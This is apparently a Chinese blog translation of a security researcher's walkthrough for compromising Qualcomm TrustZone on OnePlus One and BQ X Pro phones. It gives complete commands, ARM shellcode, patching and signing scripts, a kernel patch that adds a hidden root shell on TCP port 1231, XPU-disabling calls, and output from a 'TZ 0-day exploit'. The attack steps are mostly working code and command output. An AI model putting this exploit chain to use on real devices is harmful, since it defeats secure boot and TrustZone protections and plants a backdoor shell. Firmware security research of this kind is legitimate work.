将光明照进深渊P3(调试TrustZone)——翻译

April 24, 2021 · 分享 · 146次阅读

原文标题:Bring Light To The Darkness P3
原文地址:https://bkerler.github.io/2020/08/03/bring-light-to-the-darkness-p3/

本文是一篇翻译文章,翻译不对的地方还请指正。


打造一个可调试高通Trustzone(Aarch64架构)的环境

简介

  • 用一个没有被破坏安全启动的手机,设置Trustzone调试环境,并开启破解之旅
  • 同样适用于最终用户设备和开发板,最终我们会有完整的EL0-EL3级别的控制
  • 未破坏(安全启动的,应该是指没有解锁的),使用MSM8974、MSM8976、MSM8953、MSM8937等芯片,以及使用基于高通X6、X8或者X9调制解调器的手机,我这里使用的是BQ X Pro和Oneplus One
  • 已安装python 3.x环境(Linux)

1. 验证设备是否容易遭受冷补丁攻击

1.1 安装最新版adb和fastboot

~ $ mkdir ~/bin
~ $ cd ~/bin
~/bin $ wget https://dl.google.com/android/repository/platform-tools-latest-linux.zip; unzip platform-tools-latest-linux.zip; rm platform-tools-latest-linux.zip
~/bin $ cd ..

在配置环境变量并重启电脑后,adb应当可用

1.2 安装我提供的高通紧急下载工具

~ $ git clone https://github.com/bkerler/EDL edl
~ $ cd edl
~/edl $ python3 -m pip install pyusb pyserial
~/edl $ sudo 'echo "blacklist qcserial" >> /etc/modprobe.d/blacklist.conf'
~/edl $ sudo cp Drivers/51-edl.rules /etc/udev/rules.d
~/edl $ sudo cp Drivers/50-android.rules /etc/udev/rules.d
~/edl $ sudo udevadm control -R

1.3 从固件中提取(?)与你的设备匹配的EDL Loader并将其放入Loaders目录,并将它以[msmid]_[pkhash 8 bytes].bin这样的形式命名,或者直接使用fhloaderparse.py脚本

其实就是去 https://github.com/bkerler/EDL 下面的Loaders目录,找到匹配手机的bin文件,复制到Loaders中

例如直接复制BQ X Pro的Loader

~/edl $ cp 000460E100000000_cc3153a80293939b_FHPRG_bqXPro.bin Loaders

例如直接复制Oneplus One的Loader

~/edl $ cp 007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin Loaders

fhloaderparse脚本使用示例

~/edl $ mkdir test
~/edl $ cp emmc_prog_firehose.bin test
~/edl $ ./fhloaderparse.py test

1.4 将手机关机,然后同时按下音量+和音量-,再连接USB,这个时候手机就会进入9008模式了(当然国内很多没法直接进,最快的方法是拆机短接)

1.5 使用高通固件冷补丁验证设备是否容易受到攻击

~/edl $ ./edl.py -secureboot
  
Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.

__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: sahara
Device is in EDL mode .. continuing.
Library.sahara - 
------------------------
HWID:              0x007bc0e100000000 (MSM_ID:0x007bc0e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH:           0xcc3153a80293939b90d02d3bf8b23e0292e452fef662c74998421adad42a380f
Serial:            0x0d7e015b
SBL Version:       0x00000000

Library.sahara - Unfused device detected, so any loader should be fine...
Library.sahara - Trying loader: Loaders/qualcomm/007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin
Successfully uploaded programmer :)
  
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - Peek: Address(0xfc4b83f8),Size(0x4)
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Sec_Boot0 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot1 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot2 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot3 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Secure boot disabled.

如果最后显示的是Secure boot disabled,那就说明可以打补丁并进行破解

2. 获取设备固件

2.1 直接从设备上转储(dump)

将boot、aboot和tz分区进行转储(dump)(补充,这是在9008模式下操作

~/edl $ ./edl.py -r boot boot.img

Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.
    
__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: firehose
    
    
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - 
Reading from physical partition 0, sector 196608, sectors 32768
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Dumped sector 196608 with sector count 32768 as boot.img.

如果显示main - USB desync, please rerun command !,那就重新再执行一下命令

~/edl $ ./edl.py -r aboot aboot.img
~/edl $ ./edl.py -r tz tz.img

然后退回edl的上一级目录

~/edl $ cd ..

另外一种方案是直接下载官方的固件(工厂镜像?),然后进行攻击

例如 64 Bit BQ Aquaris X Pro MSM8953的2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip,地址如下(已失效)

https://storage.googleapis.com/otas/2017/Smartphones/Bardock_Pro/OTA_Official/Oreo/2.7.2/2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip

32 Bit Oneplus One MSM8974的cm-13.1.2-ZNH2KAS3P0-bacon-signed-fastboot.zip,地址如下(未失效)

https://www.androidfilehost.com/?fid=24591000424960109

3. 下载我的高通攻击工具并安装之

3.1 从github下载最新版

~ $ git clone https://github.com/bkerler/qcpatchtools
~ $ cd qcpatchtools

3.2 安装capstone,keystone组合引擎(工具)

~/qcpatchtools $ git clone https://github.com/keystone-engine/keystone --recursive
~/qcpatchtools $ cd keystone && mkdir -p build && cd build && cmake .. 
~/qcpatchtools/keystone $ ../make-lib.sh
~/qcpatchtools/keystone $ sudo make install 
~/qcpatchtools/keystone $ cd bindings/python
~/qcpatchtools/keystone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/keystone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf keystone
~/qcpatchtools $ git clone https://github.com/aquynh/capstone --recursive
~/qcpatchtools $ cd capstone
~/qcpatchtools/capstone $ ./make.sh
~/qcpatchtools/capstone $ sudo ./make.sh install
~/qcpatchtools/capstone $ cd bindings/python
~/qcpatchtools/capstone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/capstone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf capstone

3.3 安装必要的三方包

~/qcpatchtools $ sudo pip3 install -r requirements.txt

3.4 然后可以退出qcpatchtools文件夹了

~/qcpatchtools $ cd ~

4. 修改(基础)内核

以64 Bit BQ Aquaris X Pro MSM8953为例

4.1 下载和手机相匹配的内核源代码,编译之

~ $ git clone https://github.com/bq/aquaris-X-Pro.git
~ $ mv aquaris-X-Pro kernel
~ $ cd kernel
~/kernel $ git checkout tags/2.5.1_20190114-1551
~/kernel $ cd ..
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9
~ $ cd aarch64-linux-android-4.9
~/aarch64-linux-android-4.9 $ git checkout 22f053ccdfd0d73aafcceff3419a5fe3c01e878b
~/aarch64-linux-android-4.9 $ cd ..
~ $ mkdir KERNEL_OUT

4.2 下载我添加了自定义svc处理的补丁(参考Gal Beniamini’s的博客),同时去掉了xpu限制,添加了额外的tz svc(调用)的日志记录(指通过下面的命令对编译好的内核打补丁)

~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_bq_msm8953.diff

4.3 编译自定义内核

~ $ make -C kernel O=../KERNEL_OUT ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9 bardockpro_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9/bin/aarch64-linux-android-
~ $ cp KERNEL_OUT/arch/arm64/boot/Image.gz-dtb zkernel

以32 Bit Oneplus One MSM8974为例(具体步骤和上面基本一致,除了运行的命令稍微不一样)

4.1 编译官方内核

~ $ git clone https://github.com/LineageOS/android_kernel_oneplus_msm8974 -b cm-13.0 kernel
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-linux-androideabi-4.9
~ $ cd arm-linux-androideabi-4.9
~/arm-linux-androideabi-4.9 $ git checkout 10ddded24ecdbdeaa4ac57d49962ca06e9c1ceaa
~/arm-linux-androideabi-4.9 $ cd ..
~ $ mkdir KERNEL_OUT

4.2 用我的工具对内核打补丁

~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_oneplus_msm8974.diff

4.3 编译自定义内核

~ $ make -C kernel O=../KERNEL_OUT ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9 cyanogenmod_bacon_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9/bin/arm-linux-androideabi-
~ $ cp KERNEL_OUT/arch/arm/boot/zImage zkernel

这里没有复制zImage-dtb,是因为OnePlus不一样,它使用修改过的dtb,不过已经从boot镜像中提取了

5. 将(基础)内核进行root

为了有自己的有root(权限)的内核,(我)使用我的Android_Universal工具和EDL脚本,在一个有锁的零售版BQ X Pro手机上,通过adb开启了tz的调试(模式),然后添加了一个自定义的逆向Shell

5.1 安装android_universal工具集

~ $ git clone https://github.com/bkerler/android_universal

5.2 对存储分区进行root,然后添加一个假的root用来过AVBv1验证(Root of Trust)

~ $ cd edl
~/edl $ cp boot.img ../android_universal
~/edl $ cd ~/android_universal

对于32 Bit Oneplus One MSM8974

Oneplus One使用谷歌的test loaders签名,所以可以直接刷入boot.img.signed文件

~/android_universal $ ./makeramdisk.sh -fn boot.img -c -fs 1

对于64 Bit BQ Aquaris X Pro MSM8953

由于MSM8953系列的设备使用的是Android Verified Boot v1(AVBv1),那么需要刷入boot.img.rotfake

~/android_universal $ ./makeramdisk.sh -fn boot.img -c

5.3 makeramdisk会临时停止(等待其他动作,即给boot镜像添加自定义文件),新开一个终端,执行下面的命令

~/android_universal $ cp ../zkernel tmp/kernel 
~/android_universal $ cd ..

然后回到makeramdisk这个终端,回车,然后就会打包并签名boot镜像了

6. 为了注入代码,先准备tz的shellcode(冷补丁或者热补丁)

6.1 把合适的shellcode保存到shellcode.txt

对于32 Bit Oneplus One MSM8974

# R0 = writeflag (0=read, 0x22=write), R1=addr, R2=value, R3=readmemptr
PUSH {R4-R6,LR}
CMP  R0, #0x22
BEQ  write
LDR  R0, [R1]
STR  R0, [R3]
B exit
write:
STR  R2, [R1]
exit:
POP {R4-R6,PC}

对于64 Bit BQ Aquaris X Pro MSM8953

# X0 = writeflag (0=read, 0x22=write), R1=addr, R2=value
STP X28, X27, [SP,#-0x60]!
STP X26, X25, [SP,#0x10]
STP X24, X23, [SP,#0x20]
STP X22, X21, [SP,#0x30]
STP X20, X19, [SP,#0x40]
STP X29, X30, [SP,#0x50]
MOV X29, SP
      
# Value of arg0 0x22 means write dword from arg2 to address arg1, 
# Value of arg0 0x0  means read dword from arg2
CMP  W0, #0x22 
BEQ  write
LDR  W0, [X1]
B exit
write:
STR  W2, [X1]
        
exit:
LDP X29, X30, [SP,#0x50]
LDP X20, X19, [SP,#0x40]
LDP X22, X21, [SP,#0x30]
LDP X24, X23, [SP,#0x20]
LDP X26, X25, [SP,#0x10]
LDP X28, X27, [SP],#0x60
RET

7. 用刚才的shellcode对tz打补丁,好让我们可以进行代码注入

7.1 把前面的shellcode补丁到tz的空白的地方(指临时存放shellcode至一处没有使用的空白区域)

对于32 Bit Oneplus One MSM8974

~/qcpatchtools $ ../tz_coldpatch32.py -in tz.mbn -out tz.patched -sc shellcode.txt 
      Found svc_entry_offset: 0xfe826104.
      Possible code cave at 0xfe809c8d, file offset: 0x30b8c
      svc code: 0x0C06 (svc 0x03 cmd 0x06)
      Code to patch:70b5222802d00868106000e00a6070bd
      Patching done, saved as tz.patched

对于64 Bit BQ Aquaris X Pro MSM8953

~/qcpatchtools $ ./tz_coldpatch64.py -in ../edl/tz.img -out tz.img.patched -sc shellcode.txt
     Found code cave at 0x8657871c, file offset: 0x5c71c, svc code: 0x0200020D
     Code to patch:1f88007160000054200040b9c0035fd6220000b9c0035fd6
     Patching done, saved as tz.img.patched

7.2 使用自定义私钥对tz.bin进行签名

~/qcpatchtools $ ./qc_signer.py -t qsee -in tz.img.patched -out tz.signed

8. 对aboot打补丁以使可以自定义ramdisk

这是有AVB验证的才需要,如果是OnePlus MSM8974那就不用管

8.1 对aboot打补丁

对于32 Bit Oneplus One MSM8974

  • 不需要处理

对于64 Bit BQ Aquaris X Pro MSM8953

首先对aboot打补丁,用于过验证

~/qcpatchtools $ ./aboot_rot64.py -in ../edl/aboot.img -out aboot.patched

然后对tz.bin签名

~/qcpatchtools $ ./qc_signer.py -in aboot.bin -out aboot.signed -t appsbl
~/qcpatchtools $ rm aboot.patched

9. 刷入修改后的文件

对于32 Bit Oneplus One MSM8974

9.1 把boot和tz镜像复制到EDL文件夹

~/qcpatchtools $ cp tz.signed ../edl/ && cd ..
~/qcpatchtools $ cd ..
~ $ cp android_universal/boot.img.signed edl/

9.2 关机,然后同时音量+和音量-进入9008模式(当然前面说了,国内的设备最好短接进入最方便),刷入boot和tz

~ $ cd edl/
~/edl $ ./edl.py -w boot boot.img.signed
~/edl $ ./python3 edl.py -w tz tz.signed

9.3 重启手机

对于64 Bit BQ Aquaris X Pro MSM8953

9.1 同样的也是复制boot和tz到EDL文件夹

~/edl $ cd ~
~ $ cp qcpatchtools/aboot.signed qcpatchtools/tz.signed ../edl/
~ $ cp android_universal/boot.rotfake edl/
~ $ cd /edl

9.2 刷入aboot、boot和tz

~/edl $ ./edl.py -w boot boot.rotfake
~/edl $ ./edl.py -w aboot aboot.signed
~/edl $ ./edl.py -w tz tz.signed
~/edl $ cd ..

9.3 如果手机重启进入的是usb pid 0x900E或者0x9006模式,那么请拆机,抠下电池,断开usb连接,将emmc clk引脚接地,然后重新连接USB,取消接地,装上电池。然后这个时候就可以正常进入9008,然后可以愉快刷机了

9.4 重启手机

10. 测试设备(内核)是否成功root

10.1 如果TZ刷写失败

情况一:设备一直处于0x9006模式,救砖过程如下

首先执行下面的命令

~/edl $ ./edl.py -vid 0x05c6 -pid 0x9006

这个时候设备会作为一个分区(被挂载?),为了救砖得刷一个正常的tz,那么得备份sbl1分区,然后擦除

~/edl $ dd if=/dev/disk/by-part-label/sbl1 of=sbl1.bin
~/edl $ dd if=/dev/zero of=/dev/disk/by-part-label/sbl1

然后转到9008模式,写入正常的sbl1和tz镜像

~/edl $ ./edl.py -w sbl1 sbl1.img
~/edl $ ./edl.py -w tz tz.img

复制自定义的adb key

~ $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh

情况二:设备一直处于0x900E模式

具体表现为,设备不启动而且亮红灯(呼吸灯?),说明镜像签名有问题,你需要在手机启动时把带有DAT0和GND引脚进行短接(不要接电池),然后进入9008模式,然后装上电池,使用edl重新刷固件

~/edl $ ./edl.py -w tz tz.img

10.2 复制自定义adb key

~ $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh
  1. 为了得到有root的shell,需要先通过tcp连接上设备的1231端口,进入有隐藏root的shell,连接的时候不会有提示,输入命令回车执行即可
$ adb shell
bardock-pro:/ $ toybox nc 0.0.0.0 1231
[email protected]:/ # id
      uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
[email protected]:/ # uname -a
      Linux localhost 3.18.71-perf-g18b9c9b33ae-dirty #1 SMP PREEMPT Tue Feb 26 14:18:30 CET 2019 aarch64
[email protected]:/ # getprop | grep 8.1
      [net.tcp.buffersize.lte]: [2097152,4194304,8388608,262144,524288,1048576]
      [net.tcp.buffersize.wifi]: [524288,2097152,4194304,262144,524288,1048576]
      [ril.ecclist]: [911,112,*911,#911,000,08,110,999,118,119,122]
      [ril.ecclist1]: [911,112,*911,#911,000,08,110,999,118,119]
      [ro.bootimage.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
      [ro.boottime.adbd]: [5047811195]
      [ro.boottime.cnd]: [6851364840]
      [ro.boottime.cnss-daemon]: [6891754944]
      [ro.boottime.keystore]: [6871139580]
      [ro.boottime.mediadrm]: [6872873851]
      [ro.boottime.nfc_hal_service]: [4955175831]
      [ro.boottime.nvtool]: [6861805830]
      [ro.boottime.nxpnfc_hal_svc]: [4962930831]
      [ro.boottime.ril-daemon]: [6887123642]
      [ro.boottime.storaged]: [6882149788]
      [ro.boottime.time_daemon]: [6853684111]
      [ro.boottime.tombstoned]: [6930821819]
      [ro.boottime.vndservicemanager]: [4090654841]
      [ro.build.description]: [bardockpro_bq-user 8.1.0 OPM1.171019.026 1492 release-keys]
      [ro.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
      [ro.build.version.base_os]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1422:user/release-keys]
      [ro.build.version.release]: [8.1.0]
      [ro.com.google.gmsversion]: [8.1_201810]

11. 和tz对话(读取tz内存)

对于32 Bit Oneplus One MSM8974

从tz内读取dword内存(地址 -> 0xFE82CDA0)示例

$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
[email protected]:/ # cd /data/local/tmp
[email protected]:/data/local/tmp # ./qcxploit exploit8974
[email protected]:/data/local/tmp # ./qcxploit readmem 0xFE82CDA0 4
0xFE805738
385780FE

对于64 Bit BQ Aquaris X Pro MSM8953

从tz内读取dword内存(地址 -> 0x8657871c)示例

$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
[email protected]:/ # cd /data/local/tmp
[email protected]:/data/local/tmp # ./qcxploit readmem 8657871c 4
  Sending SVC: 0x200020d
  Data:
  0xA9BA6FFC
  FC6FBAA9

12. 如何对tz打补丁(指令写空白区)

对于32 Bit Oneplus One MSM8974

12.1 禁用XPU

[email protected]:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0xFC48B080 0x0
      Sending SVC: 0x10, CMD: 0x2
      IOCTL RES: 0x0000001E

[email protected]:/ # /data/local/tmp/qcxploit exploit8974
      MSM8974 TZ 0-day exploit by B.Kerler 2017
      ----------------------------------------------------------
      Disable NS Blacklist
      Zeroing out IMEM
      Refreshing NS Blacklist
      Done exploiting

12.2 读写

  • 读dword
[email protected]:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x0 0x[addr_to_read] 0x[bufferaddr]
  • 写dword
[email protected]:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0x[addr_to_write] 0x[value_to_write]
  • 禁用XPU后读
[email protected]:/ # /data/local/tmp/qcxploit readmem [addr_to_read] [length_to_read]
  • 禁用XPU后写
[email protected]:/ # /data/local/tmp/qcxploit writemem [addr_to_write] [value_to_write_as_hexstring]

12.3 生成shellcode

~/qcpatchtools ~ Tools/asmtools.py -asm arm,thumb -in ShellCode/shellcode_examples/read_write_shellcode_arm.txt 
      CPU: arm, MODE: thumb
      70b5222802d00868106000e00a6070bd

12.4 注入shellcode(0xfe809c8d就是7.1.部分的偏移量)

[email protected]:/data/local/tmp # ./qcxploit writemem FE809C8D 70b5222802d00868106000e00a6070bd

12.5 运行注入的shellcode

[email protected]:/data/local/tmp # ./qcxploit svcreg32 06 03 03 0 0xFE808796 0xFE82830c
          Sending SVC: 0xc, CMD: 0xe
          IOCTL RES: 0x0000003E
[email protected]:/data/local/tmp # ./qcxploit readmem 0xFE82830C 4
          Memory read:
         70B5042B

12.6 执行出现异常,请查看/d/tzdbg/log

对于64 Bit BQ Aquaris X Pro MSM8953

12.1 禁用XPU

禁用HWIO_BIMC_S_DDR0_XPU_SCR_ADDR,可选,但会禁用tz key

[email protected]:/ # ./qcxploit svcreg 200020D 4 22 44a000 13f 0

禁用HWIO_BIMC_S_DDR0_XPU_CR_ADDR

[email protected]:/ # ./qcxploit svcreg 200020D 4 22 44a080 19e 0

禁用HWIO_OCIMEM_MPU_XPU_SCR_ADDR,可选,但会禁用tz key

[email protected]:/ # ./qcxploit svcreg 200020D 4 22 53000 13f 0

禁用HWIO_OCIMEM_MPU_XPU_CR_ADDR

[email protected]:/ # ./qcxploit svcreg 200020D 4 22 53080 11f 0

通过修改有保护的内存区域实现禁用写保护,并非指的是tz代码开始的区域(地址),而是指tz代码结束的区域(地址)(将0x866f0000写到HWIO_BIMC_S_DDR0_XPU_PRT2_START0_ADDR),这是tz的bug

[email protected]:/ # ./qcxploit svcreg 200020D 4 22 44a340 866f0000 0

12.2 开启tz的调试日志

[email protected]:/ # mount -t debugfs debugfs /d/
[email protected]rdock:/ # ls /d/tzdbg

12.3 现在可以用devmem把任何代码上传到tz了,这里以svc cmd 0x200030F写入tz为例

[email protected]:/ # ./busybox devmem 0x865ef918
[email protected]:/ # ./busybox devmem 0x865ef918 32 0x865630fc
[email protected]:/ # ./busybox devmem 0x865ef918 32 0x86572214
[email protected]:/ # ./busybox devmem 0x8657221C 32 0xD2800000
[email protected]:/ # ./qcxploit svcreg 200030F 4 0 53000 13e 0

ENJOY 3

none

最后编辑于6个月前

添加新评论

  1. kk kk
    2021-04-24 20:14

    好文!! 可惜看不懂。

    回复
avatar

未末

118

文章数

260

评论数

7

分类

新鲜出炉の评论

获取CSDN学院m3u8解密的key
路人甲
路人甲2021-10-05

请问这个方法失效了么?获取到的是空串

获取CSDN学院m3u8解密的key
DK爱梦游
DK爱梦游2021-09-29

大佬求教,51cto的KEY怎么获取?

XstreamDL-CLI BUG修复记录
poohboy
poohboy2021-09-25

大佬,我想问一下,iqiyi的m3u8是不是没法获取?我只找到了一个dash链接,然后手动下载了里面的m4s,但用nilaoda的那个解密工具解不了,老提示获取kid失败

XstreamDL-CLI BUG修复记录
Andist
Andist2021-09-17

en……实在不好意思,代理我知道怎么启用了。我只勾选了自定义代理,但没有填写proxy参数,我太愚钝了对不起!!!

XstreamDL-CLI BUG修复记录
Andist
Andist2021-09-17

感谢您开发的这款软件,对于第一次下载mpd的小白而言很友好! 这段时间用下来就是有时候下载直连的海外视频流时可能因为网络状况不佳,会有下载不完整的问题,下载完进度没到100%,但是也合并解密了,不知道能否增加下载不完整在最后输出报错信息的功能呢? 以及我想请教一下如何让下载器使用小飞机的代理呢?我尝试在“使用自定义代理”的选项上勾选,但是好像命令行中没有变化? (另外我猜您图中的样本是在下载CP+上的用九柑仔店是吗?我也很喜欢这部剧,是我心目中排名第一的台剧哈哈)